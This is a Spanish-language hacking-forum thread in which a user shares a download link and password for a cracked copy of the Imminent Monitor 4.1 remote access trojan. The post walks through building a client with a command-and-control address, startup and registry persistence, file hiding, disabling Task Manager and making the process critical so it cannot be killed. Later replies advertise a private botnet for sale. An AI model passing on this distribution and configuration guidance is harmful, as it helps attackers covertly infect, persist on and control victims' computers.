WINTXCODERS Terminal
[visitante@wintxcoders-pc ~]:$ Bienvenido a la comunidad
Recuerda que puedes participar en nuestra comunidad registrándote

IM4 | Imminent monitor 4.1 | RAT | Persistencia | Botkiller | Buena interfaz.

Iniciado por Neva();, Marzo 06, 2017, 09:04:34 PM

« anterior - próximo »

Neva();

Avanzado

  • Desconectado
  • Hace tiempo compré IM4, la verdad es que es genial y recomendaría comprarlo, son sólo 25$, único pago.
    Esta versión fue publicada por el equipo de RTN, fue crackeada hace no mucho tiempo por lo que el programa es bastante nuevo.
    Si los queréis descargar, id a esta página: http://www.filedropper.com/imminentmonitor4100crackedbyyq8
    Contrase;a: xpaulo
    VirusTotal: https://virustotal.com/es/file/bee88762f8dae52a6525148f541aada5a219f62d99e5983a9174c0b566955492/analysis/1488829717/ (.rar)
    https://virustotal.com/es/file/491f3f7c26ce56b64346075ad0cb01855f7712a437dc2859a7522715231fd834/analysis/1488829751/ server
    Es muy detectado, no obstante le he echado un ojo y a primera vista parece estar limpio, el programa funciona correctamente.
    No obstante aconsejo abrirlo siempre en una máquina virtual o sandbox.

    Instalación:
    Abre el archvio dentro de la carpeta Builder, deberás ver un programa que es así.

    Cambia el mutex para obtener una clave nueva aleatoria, Mutex lo que hace es que tu archivo no tenga más de una instancia abierta.
    Client group es el nombre del grupo al que pertenece el infectado, digamos que tienes dos plantas de trabajo donde monitorizas a tus empleados, les podrás llamar planta-1 y planta-2 para una mayor organización.
    Ip/dns es tu dominio o ip, asegúrate de tener los puertos abiertos y los firewalls desactivados!
    Pasemos a la siguiente ventana.

    Esta ventana hace referencia al inicio del ejecutable con windows, si seleccionas el checkbox, el programa se ejecutará siempre que se inicie el ordenador.
    Respecto al startup name y todo eso, da igual el valor que le pongas, a tu gusto.
    Finalmente:

    Esta configuración te ayudará a prevenir que tu archivo sea borrado, es una pena que la versión crackeada no tenga system wide injection..  :(
    Bien , melt file significa que el archivo se borrará y se irá a otra carpeta después de ser abierto.
    Disable taskmanager cerrará el administrador de tareas si éste es abierto.
    Hide file esconde el archivo
    process kernel secutity hará que el proceso sea crítico por lo que si es cerrado, el ordenador deja de responder.
    Registry persistence es un bucle que mira que nuestro programa no ha sido desactivado en el registro para la próxima vez que sea ejecutado.
    Bien, ya tenemos nuestro cliente hecho! pasemos al servidor.
    El apartado general yo lo dejaría así..

    Acto seguido ve a la tabla de ports y a;ade el puerto que has seleccionado antes cuando has creado el cliente. (click derecho!)

    Y eso es todo, una vez has hecho esto  tu RAT está funcionando y esperando a conexiones

    BASUH

    Visitante

  • Desconectado




  • Neva();

    Avanzado

  • Desconectado
  • Cita de: ForoLand en Marzo 14, 2017, 04:04:04 PM
    Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
    Yo tengo una programa por mí pero que no he sacado al público
    https://forum.wintxcoders.com/index.php?topic=529.msg2203#msg2203
    Lo único es que quité la UI y se basa totalmente en comandos, no obstante también es compatible con un panel webserver.
    La verdad es que estoy bastante orgulloso del resultado final  ;)

    ForoLand


  • Cita de: Neva(); en Marzo 14, 2017, 05:48:02 PM
    Cita de: ForoLand en Marzo 14, 2017, 04:04:04 PM
    Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
    Yo tengo una programa por mí pero que no he sacado al público
    https://forum.wintxcoders.com/index.php?topic=529.msg2203#msg2203
    Lo único es que quité la UI y se basa totalmente en comandos, no obstante también es compatible con un panel webserver.
    La verdad es que estoy bastante orgulloso del resultado final  ;)

    Crees posible que pronto, lleguemos a tenerla por aqui por wintxcoders ;)

    Neva();

    Avanzado

  • Desconectado
  • Cita de: ForoLand en Marzo 15, 2017, 01:22:34 AM
    Cita de: Neva(); en Marzo 14, 2017, 05:48:02 PM
    Cita de: ForoLand en Marzo 14, 2017, 04:04:04 PM
    Seria Bueno que de aqui de WTX, Sacaran una Botnet  :-[
    Yo tengo una programa por mí pero que no he sacado al público
    https://forum.wintxcoders.com/index.php?topic=529.msg2203#msg2203
    Lo único es que quité la UI y se basa totalmente en comandos, no obstante también es compatible con un panel webserver.
    La verdad es que estoy bastante orgulloso del resultado final  ;)

    Crees posible que pronto, lleguemos a tenerla por aqui por wintxcoders ;)
    Lo dudo, si eso lo finalizaré en verano y no creo que nadie lo compre en este foro, el precio de cada bin costará unos 400$